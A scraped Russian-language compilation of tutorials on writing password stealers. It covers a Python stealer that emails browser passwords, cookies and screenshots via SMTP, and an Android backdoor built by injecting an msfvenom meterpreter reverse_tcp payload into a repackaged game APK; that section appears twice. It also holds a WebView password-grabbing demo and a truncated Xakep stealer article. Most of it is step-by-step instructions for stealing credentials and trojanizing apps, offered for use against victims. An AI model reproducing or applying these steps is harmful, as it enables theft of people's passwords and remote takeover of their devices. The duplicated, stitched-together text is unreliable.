- Стиллер паролей на python с отправкой на почту
- Стиллер паролей на python
- Приступим к делу
- Ссылки
- О песочнице
- О модерации
- Создаём стиллер на Android
- Установка необходимых компонентов
- Сборка бекдора
- Стиллеры паролей для андроид
- Создаём стиллер на Android
- Установка необходимых компонентов
- Сборка бекдора
- Пишем стилер. Как вытащить пароли Chrome и Firefox своими руками
- Содержание статьи
- WARNING
- Что скажет антивирус?
- Chrome
- Продолжение доступно только участникам
- Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Стиллер паролей на python с отправкой на почту
Стиллер паролей на python
Привет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров таких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на котором открыли стиллер, его место нахождение и его установленная система.
Приступим к делу
Создаем новый файл в IDLE Python или в другой IDE.
Подключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.
Собираем с пользователя все его данные.
Собираем пароли с хрома.
Собираем куки с хрома.
Пароли с хромиума.
Куки с хромиума.
Пароли с яндекс браузера.
Данные с FILEZILLA.
Делаем скриншот экрана.
Тут записываем наши тхт в один ZIP — doc.
Вот он наш ZIP по всеми данными.
Тут мы создаем вложение для нашего doc’а ZIP.
Здесь мы собственно производим отправку на емаил с помощью SMTP
Чтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:
На странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к аккаунту, и включите. Тогда все будет ОК.
Вот что в архиве.
Открываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.
cd и путь к файлу.
Теперь pyinstaller —onefile название вашего файла.py, ентер.
Ссылки
О песочнице
Это «Песочница» — раздел, в который попадают дебютные посты пользователей, желающих стать полноправными участниками сообщества.
Если у вас есть приглашение, отправьте его автору понравившейся публикации — тогда её смогут прочитать и обсудить все остальные пользователи Хабра.
Чтобы исключить предвзятость при оценке, все публикации анонимны, псевдонимы показываются случайным образом.
О модерации
Не надо пропускать:
- рекламные и PR-публикации
- вопросы и просьбы (для них есть Хабр Q&A);
- вакансии (используйте Хабр Карьеру)
- статьи, ранее опубликованные на других сайтах;
- статьи без правильно расставленных знаков препинания, со смайликами, с обилием восклицательных знаков, неоправданным выделением слов и предложений и другим неуместным форматированием текста;
- жалобы на компании и предоставляемые услуги;
- низкокачественные переводы;
- куски программного кода без пояснений;
- односложные статьи;
- статьи, слабо относящиеся к или не относящиеся к ней вовсе.
Источник
Создаём стиллер на Android
Совсем недавно мы узнали, как делать стиллер для ПК.
Сегодня мы будем делать стиллер для андроид на Kali Linux (тоже со смартфона).
Установка необходимых компонентов
Устанавливаем Kali Linux (https://www.kali.org/downloads/).
Далее установим Zipalign
Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл (https://gist.github.com/bmaupin/48140926ce11fbeddec2). Также понадобятся предустановленные ngrok и Metasploit.
Сборка бекдора
Запускаем в отдельном окне ngrok
Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST= LPORT= M> /home/kali/payload.apk
На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью команд:
Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку «virtual methods» и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000
Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered
Выравниваем подписанное приложение командой
Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
Источник
Стиллеры паролей для андроид
Password Stealer Demo
This app demonstrates how an app can use JavaScript to steal your password in a log in form. It specifically looks for Google’s password box (specific minified class name). If you log into your account, it should show your password in a toast at the bottom of the screen. This could be stored without showing the user at all.
The WebViewClient’s method shouldOverrideUrlLoading is used as a sort of listener to call the method getPassword every time a URL is loaded. getPassword runs a JavaScript snippet on the view which gets all the elements of class «whsOnd zHQkBf» (the minified class name of Google’s input fields) and returns the value of the first element with input type password . When the JS finishes evaluating, the retrieved password (if found) is displayed via a toast. shouldOverrideUrlLoading then returns false and the webview continues as normal. This demo does not save your password, but a malicious application easily could without the user knowing.
If Google’s login doesn’t immediately redirect you to another page (maybe for two factor authentication), then shouldOverrideUrlLoading will not get called and no password will be retrieved. I’d imagine there is some other way to force the JS to get exectuted or even have it run in a loop on every page, but I haven’t tried.
One benefit of shouldOverrideUrlLoading being used to run the JavaScript is that the password is only stolen if the password is correct (since it took them to the next page). This makes the stolen information valueable 100% of the time.
Источник
Создаём стиллер на Android
Совсем недавно мы узнали, как делать стиллер для ПК.
Сегодня мы будем делать стиллер для андроид на Kali Linux (тоже со смартфона).
Установка необходимых компонентов
Устанавливаем Kali Linux (https://www.kali.org/downloads/).
Далее установим Zipalign
Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл (https://gist.github.com/bmaupin/48140926ce11fbeddec2). Также понадобятся предустановленные ngrok и Metasploit.
Сборка бекдора
Запускаем в отдельном окне ngrok
Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST= LPORT= M> /home/kali/payload.apk
На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью команд:
Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку «virtual methods» и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000
Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered
Выравниваем подписанное приложение командой
Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
Источник
Пишем стилер. Как вытащить пароли Chrome и Firefox своими руками
Содержание статьи
WARNING
Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.
Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.
В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если тебе нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом. Как это сделать, я показывал в статье «Тайный WinAPI. Как обфусцировать вызовы WinAPI в своем приложении».
Что скажет антивирус?
Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом.
Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.
Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.
Chrome
Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:
Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.
Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).
Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family , оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).
Если условие browser_family == 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family == 1 — Firefox. Идентификатор CHROME_DB_PATH указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции SHGetFolderPath , передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA , которое означает:
Функция SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath . Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:
После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH .
База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.
Теперь подключаемся к базе командой sqlite3_open_v2 . Ее прототип:
Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK , в противном случае возвращается код ошибки.
Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.
Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec() .
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
Источник